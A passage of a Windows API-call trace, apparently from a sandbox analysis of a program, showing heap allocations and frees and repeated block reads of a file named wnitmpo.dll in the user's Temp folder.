returned 1 [0118.985] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc90 | out: hHeap=0x7e0000) returned 1 [0118.985] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xb3e8718 | out: hHeap=0x7e0000) returned 1 [0118.985] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd50 | out: hHeap=0x7e0000) returned 1 [0118.985] GetLastError () returned 0x0 [0118.985] SetLastError (dwErrCode=0x0) [0118.985] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bd50 [0118.985] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bc60 [0118.985] GetLastError () returned 0x0 [0118.985] SetLastError (dwErrCode=0x0) [0118.985] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4) returned 0xc91bd80 [0118.985] GetLastError () returned 0x0 [0118.985] SetLastError (dwErrCode=0x0) [0118.986] GetLastError () returned 0x0 [0118.986] SetLastError (dwErrCode=0x0) [0118.986] GetLastError () returned 0x0 [0118.986] SetLastError (dwErrCode=0x0) [0118.986] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb8) returned 0xb3e9b58 [0118.986] GetLastError () returned 0x0 [0118.986] SetLastError (dwErrCode=0x0) [0118.986] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a6) returned 0xcaae550 [0118.986] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0118.987] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd50 | out: hHeap=0x7e0000) returned 1 [0118.987] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xb3e8958 | out: hHeap=0x7e0000) returned 1 [0118.987] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd80 | out: hHeap=0x7e0000) returned 1 [0118.987] GetLastError () returned 0x0 [0118.987] SetLastError (dwErrCode=0x0) [0118.987] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bd80 [0118.987] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc60 | out: hHeap=0x7e0000) returned 1 [0118.987] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd30 | out: hHeap=0x7e0000) returned 1 [0118.987] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x8) returned 0xc91bc70 [0118.987] SetFilePointerEx (in: hFile=0xcb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6f6c38 | out: lpNewFilePointer=0x0) returned 1 [0118.988] SetFilePointerEx (in: hFile=0xcb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6f5c14 | out: lpNewFilePointer=0x0) returned 1 [0118.988] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x60) returned 0xca3a368 [0118.988] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x40) returned 0x10263330 [0118.988] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e47e8 [0118.988] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ae000 [0118.988] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e47e8 | out: hHeap=0x7e0000) returned 1 [0118.988] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x47) returned 0xca3fbf0 [0118.990] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae000 | out: hHeap=0x7e0000) returned 1 [0118.990] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a) returned 0xc967f80 [0118.990] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca3fbf0 | out: hHeap=0x7e0000) returned 1 [0118.990] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1000) returned 0xc95c840 [0118.991] GetLastError () returned 0x0 [0118.991] SetLastError (dwErrCode=0x0) [0118.991] WriteFile (in: hFile=0xcb0, lpBuffer=0xc95c840*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x6f51f4, lpOverlapped=0x0 | out: lpBuffer=0xc95c840*, lpNumberOfBytesWritten=0x6f51f4*=0x58, lpOverlapped=0x0) returned 1 [0118.992] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc95c840 | out: hHeap=0x7e0000) returned 1 [0118.992] CloseHandle (hObject=0xcb0) returned 1 [0118.993] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bc30 [0118.994] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bc40 [0118.994] AreFileApisANSI () returned 1 [0118.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10263060, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0118.994] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x62) returned 0xca77f48 [0118.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10263060, cbMultiByte=-1, lpWideCharStr=0xca77f48, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll") returned 49 [0118.994] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wnitmpo.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x6f6b98, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcb0 [0118.994] GetFileType (hFile=0xcb0) returned 0x1 [0118.995] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca77f48 | out: hHeap=0x7e0000) returned 1 [0118.996] SetFilePointerEx (in: hFile=0xcb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6f6c50 | out: lpNewFilePointer=0x0) returned 1 [0118.996] SetFilePointerEx (in: hFile=0xcb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6f6c48 | out: lpNewFilePointer=0x0) returned 1 [0118.997] SetFilePointerEx (in: hFile=0xcb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6f5c34 | out: lpNewFilePointer=0x0) returned 1 [0118.997] SetFilePointerEx (in: hFile=0xcb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6f6c38 | out: lpNewFilePointer=0x0) returned 1 [0118.997] SetFilePointerEx (in: hFile=0xcb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6f5c14 | out: lpNewFilePointer=0x0) returned 1 [0118.997] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1000) returned 0xc95d848 [0118.997] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0118.998] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e47e8 [0118.998] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ae1c0 [0118.998] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e47e8 | out: hHeap=0x7e0000) returned 1 [0118.998] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x47) returned 0xca40050 [0118.998] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae1c0 | out: hHeap=0x7e0000) returned 1 [0118.998] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a) returned 0xc967800 [0118.998] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca40050 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x9e) returned 0xc918250 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc967800 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x80) returned 0xca32ea8 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xec) returned 0xb26b1e8 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc918250 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x161) returned 0x8967710 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xb26b1e8 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x211) returned 0xca74068 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x8967710 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x319) returned 0xcaae550 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca74068 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4a5) returned 0xcaae878 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6f7) returned 0x102a3270 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae878 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x5b0) returned 0x102a3970 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca32ea8 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xae0) returned 0xca80bf8 [0118.999] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102a3970 | out: hHeap=0x7e0000) returned 1 [0118.999] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x104f) returned 0xcaa1510 [0119.000] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca80bf8 | out: hHeap=0x7e0000) returned 1 [0119.002] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.002] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1876) returned 0xcaa2568 [0119.002] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaa1510 | out: hHeap=0x7e0000) returned 1 [0119.002] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xa72) returned 0xcaae550 [0119.002] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102a3270 | out: hHeap=0x7e0000) returned 1 [0119.002] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x24b0) returned 0x1026c770 [0119.003] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaa2568 | out: hHeap=0x7e0000) returned 1 [0119.003] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.004] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x3707) returned 0x1026ec28 [0119.004] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x1026c770 | out: hHeap=0x7e0000) returned 1 [0119.006] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.006] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x528a) returned 0x10272338 [0119.006] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x1026ec28 | out: hHeap=0x7e0000) returned 1 [0119.007] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.008] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.009] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x7bce) returned 0x102775d0 [0119.009] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x10272338 | out: hHeap=0x7e0000) returned 1 [0119.010] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.013] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.014] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xb9b4) returned 0x102a4ea0 [0119.014] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102775d0 | out: hHeap=0x7e0000) returned 1 [0119.014] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.015] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.015] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xfaa) returned 0x102a3270 [0119.015] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0119.016] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.016] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.016] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1168d) returned 0x102b0860 [0119.016] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102a4ea0 | out: hHeap=0x7e0000) returned 1 [0119.016] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.016] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.017] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.017] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.017] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.017] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.017] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1a1d3) returned 0x102c1ef8 [0119.019] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102b0860 | out: hHeap=0x7e0000) returned 1 [0119.020] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.020] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x177e) returned 0xcaa1510 [0119.020] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102a3270 | out: hHeap=0x7e0000) returned 1 [0119.020] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.040] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.040] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.040] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.041] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.041] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.041] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.041] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.041] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x272bc) returned 0x102dc0d8 [0119.045] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102c1ef8 | out: hHeap=0x7e0000) returned 1 [0119.045] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.045] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.045] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.046] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.046] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.046] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.046] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.047] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.047] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.047] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.047] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.048] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.048] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.048] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x3ac19) returned 0x103033a0 [0119.073] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102dc0d8 | out: hHeap=0x7e0000) returned 1 [0119.073] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.074] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.074] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.074] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.074] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.075] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.075] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.075] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.075] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.076] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.076] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.076] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6f6c38, lpOverlapped=0x0 | out: lpBuffer=0xc95d848*, lpNumberOfBytesRead=0x6f6c38*=0x1000, lpOverlapped=0x0) returned 1 [0119.076] ReadFile (in: hFile=0xcb0, lpBuffer=0xc95d848, nNumberOfBytesToRead=0x1000, 